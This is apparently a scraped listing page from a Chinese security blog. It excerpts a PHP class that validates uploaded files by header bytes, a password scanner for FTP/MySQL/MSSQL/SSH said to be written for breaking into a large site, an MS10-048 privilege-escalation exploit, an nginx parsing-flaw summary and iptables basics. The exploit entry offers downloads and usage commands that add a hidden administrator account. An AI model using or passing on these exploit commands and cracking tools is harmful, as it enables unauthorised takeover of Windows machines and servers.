正在加载...
分页: 1/3 第一页 1 2 3 下页 最后页 [ 显示模式: 摘要 | 列表 ]
From:http://www.zdyi.com/file-type-validation/624

      在PHP开发中,传统的上传文件类型验证是基于文件扩展名的验证方式(如pathinfo函数),很容易通过修改扩展名来欺骗。
我这里写了一个验证类,是通过文件头来判断文件格式.(也不是百分之百安全,如果用户伪造了文件头,也能通过验证)

[code]<?php
/**
* 检证文件类型类
*
* @author Silver
*/
class FileTypeValidation
{
  // 文件类型,不同的头信息
  private static $_fileFormats = Array(
    'jp2' => '0000000C6A502020',<
Tags: , ,
From:http://www.sablog.net/blog/scanpass-ftp-mysql-mssql-ssh/

帮我们公司的某猥琐男写的。据说是渗透某个大站要用到。

可以扫FTP\MYSQL\MSSQL\SSH密码

比如webshell在linux下。不会在LINUX下渗透。可以试试这个。

点击在新窗口中浏览此图片

演示地址
http://tools.selboo.com.cn/security/scanpass.php

下载地址
下载文件 (已下载 188 次)
Tags: , ,

MS10-048本地提权EXP x86 x64

[ 2010/10/08 20:48 | by selboo ]


ms10048x86.rar
下载文件 (已下载 631 次)


ms10048x64.rar
下载文件 (已下载 547 次)



漏洞说明:http://sebug.net/exploit/20030/

使用:
ms10048.exe ma.exe
ms10048.exe net user selboo 123456 /add
ms10048.exe net localgroup administrators selboo /add

http://support.microsoft.com/kb/2160329
Tags: ,

nginx文件类型错误解析漏洞

[ 2010/05/21 21:08 | by selboo ]
nginx文件类型错误解析漏洞:http://www.80sec.com/nginx-securit.html

漏洞介绍:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题,默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的nginx服务器。

演示
点击在新窗口中浏览此图片

漏洞分析:nginx默认以cgi的方式
Tags: ,
iptables 相关概念

匹配(match):符合指定的条件,比如指定的 IP 地址和端口。
丢弃(drop):当一个包到达时,简单地丢弃,不做其它任何处理。
接受(accept):和丢弃相反,接受这个包,让这个包通过。
拒绝(reject):和丢弃相似,但它还会向发送这个包的源主机发送错误消息。这个错误消息可以指定,也可以自动产生。
目标(target):指定的动作,说明如何处理一个包,比如:丢弃,接受,或拒绝。
跳转(jump):和目标类似,不过它指定的不是一个具体的动作,而是另一个链,表示要跳转到那个链上。
阅读全文
分页: 1/3 第一页 1 2 3 下页 最后页 [ 显示模式: 摘要 | 列表 ]